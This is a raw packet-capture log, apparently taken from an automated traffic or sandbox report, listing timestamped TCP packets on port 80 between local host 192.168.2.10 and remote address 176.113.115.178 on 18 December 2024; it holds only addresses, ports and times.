                                                        Dec 18, 2024 14:08:22.969958067 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.970011950 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.970740080 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.971070051 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.971170902 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.971211910 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.972126961 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.972176075 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.972207069 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.973129988 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.973270893 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.973294020 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.974307060 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.974328041 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.974364042 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.975610018 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.975624084 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.975686073 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.976345062 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.976414919 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.976447105 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.977247000 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.977308035 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.977375031 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.978290081 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.978355885 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.978375912 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.979460955 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.979527950 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.979533911 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.980514050 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.980526924 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.980647087 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.981446981 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.981458902 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.981504917 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.982408047 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.982450008 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.982537985 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.983534098 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.983601093 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.983746052 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.984762907 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.984822989 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.984870911 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.985831022 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.985938072 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.986042976 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.986994982 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.987075090 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.987107038 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.987976074 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.988056898 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.988166094 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.988657951 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.988670111 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.988730907 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.989633083 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.989698887 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.989845037 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.990650892 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.990736961 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.990767002 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.991724968 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.991791010 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.991861105 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.992772102 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.992827892 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.992851973 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.993761063 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.993905067 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.993927956 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.994856119 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.994925022 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.994987965 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.995876074 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.995939016 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.995965958 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.996836901 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.996969938 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.996974945 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.997867107 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.997917891 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.997956991 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.998969078 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:22.999059916 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:22.999083996 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.000040054 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.000107050 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.000169039 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.001121044 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.001185894 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.001251936 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.002084017 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.002166033 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.002185106 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.003083944 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.003189087 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.003226042 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.004134893 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.004344940 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.004375935 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.005163908 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.005374908 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.005409002 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.006362915 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.006375074 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.006443977 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.007216930 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.007380009 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.007416964 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.008264065 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.008383989 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.008384943 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.009294033 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.009434938 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.009497881 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.010309935 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.010430098 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.010438919 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.011322975 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.011456013 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.011477947 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.012372971 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.012475014 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.012523890 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.013411045 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.013544083 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.013596058 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.014424086 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.014472961 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.014508963 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.015465975 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.015655041 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.015803099 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.016509056 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.016585112 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.016598940 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.017527103 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.017703056 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.017771959 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.018538952 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.018590927 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.038337946 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.038559914 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.038640022 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.038847923 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.038974047 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.039046049 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.039901972 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.040000916 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.040111065 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.040896893 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.083920956 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.160249949 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.160267115 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.160320997 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.160676003 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.160798073 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.160897017 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.161716938 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.161866903 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.161998987 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.162838936 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.163099051 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.163161039 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.163201094 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.164222956 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.164235115 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.164400101 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.165405989 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.165419102 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.165484905 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.166277885 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.166346073 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.166378021 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.167363882 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.167486906 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.167520046 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.168422937 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.168570042 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.168661118 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.169514894 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.169570923 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.169574022 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.170331001 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.170394897 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.170416117 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.171351910 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.171391010 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.171471119 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.172463894 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.172585011 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.172666073 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.173511028 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.173557043 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.173598051 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.174453974 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.174515963 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.174549103 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.179425955 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.179444075 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.179475069 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.179486990 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.179517984 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.179528952 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.179543972 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.179543972 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.179553986 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.179568052 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.179591894 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.179591894 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.179591894 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.179723024 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.179800034 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.180612087 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.180680037 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.180767059 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.181690931 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.181807995 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.181833029 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.182735920 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.182807922 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.182878017 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.183743000 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.183854103 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.184003115 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.184988976 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.185056925 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.185096979 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.185856104 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.185916901 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.185935020 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.186945915 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.187014103 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.187149048 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.188029051 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.188041925 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.188097000 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.188935995 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.189064980 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.189289093 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.189939022 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.190016031 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.190099955 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.190972090 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.191028118 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.191051006 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.192013979 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.192039967 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.192097902 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.193026066 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.193348885 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.193573952 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.194255114 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.194334030 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.194336891 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.195211887 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.195276976 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.195319891 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.196172953 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.196211100 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.196356058 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.197355032 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.197382927 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.197523117 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.198271990 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.198400021 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.198411942 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.199364901 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.199460030 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.199479103 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.200328112 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.200470924 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.200532913 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.201389074 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.201401949 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.201524973 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.202334881 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.202424049 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.202455997 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.203800917 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.203926086 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.204014063 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.204521894 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.204580069 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.204592943 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.205419064 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.205533028 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.205581903 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.206542015 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.206605911 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.206629992 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.207570076 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.207645893 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.207770109 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.208578110 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.208668947 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.208731890 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.212574959 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.212588072 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.212600946 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.212663889 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.212663889 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.230989933 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.231014967 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.231260061 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.231359959 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.231529951 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.231749058 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.232359886 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.232568026 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.232713938 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.233419895 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.287138939 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.352202892 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.352273941 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.352572918 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.352713108 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.352881908 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.353791952 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.353810072 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.353847027 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.353879929 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.354815960 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.355113983 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.355350018 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.355438948 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.356184959 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.356215000 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.356297016 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.357156038 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.357244015 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.357295036 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.358233929 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.358445883 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.358546972 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.359252930 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.359294891 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.359395027 CET4974680192.168.2.10176.113.115.178
